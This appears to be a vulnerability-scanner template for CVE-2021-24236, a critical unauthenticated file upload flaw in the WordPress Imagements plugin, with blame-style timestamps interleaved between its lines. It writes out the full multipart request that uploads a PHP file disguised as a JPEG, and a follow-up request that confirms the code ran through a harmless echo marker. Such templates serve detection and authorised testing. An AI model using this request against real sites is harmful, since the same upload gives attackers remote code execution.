2022-07-30 10:13:30 +00:00
id : CVE-2021-24236
info :
2022-10-10 19:22:59 +00:00
name : WordPress Imagements <=1.2.5 - Arbitrary File Upload
2022-07-30 10:13:30 +00:00
author : pussycat0x
severity : critical
description : |
2022-10-10 19:22:59 +00:00
WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
2022-07-30 10:13:30 +00:00
reference :
- https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
2022-07-31 04:35:00 +00:00
- https://wordpress.org/plugins/imagements/
2022-07-30 22:42:08 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
2022-10-10 19:22:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24236
2022-07-30 10:13:30 +00:00
classification :
2022-10-10 19:40:25 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-07-30 10:13:30 +00:00
cve-id : CVE-2021-24236
2022-10-10 19:40:25 +00:00
cwe-id : CWE-434
2022-10-10 19:22:59 +00:00
tags : cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive
2022-07-30 10:13:30 +00:00
variables :
php : "{{to_lower('{{randstr}}')}}.php"
post : "1"
requests :
- raw :
- |
POST /wp-comments-post.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="comment"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="author"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="email"
{{randstr}}@email.com
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="url"
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="checkbox"
2022-10-25 13:40:49 +00:00
2022-07-30 10:13:30 +00:00
yes
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="naam"
{{randstr}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="image"; filename="{{php}}"
Content-Type : image/jpeg
<?php echo 'CVE-2021-24236'; ?>
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="submit"
Post Comment
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="comment_post_ID"
{{post}}
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition : form-data; name="comment_parent"
0
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
- |
GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
Host : {{Hostname}}
req-condition : true
matchers :
- type : word
part : body_2
words :
2022-07-30 22:42:08 +00:00
- "CVE-2021-24236"
2022-10-10 19:22:59 +00:00
# Enhanced by mp on 2022/10/06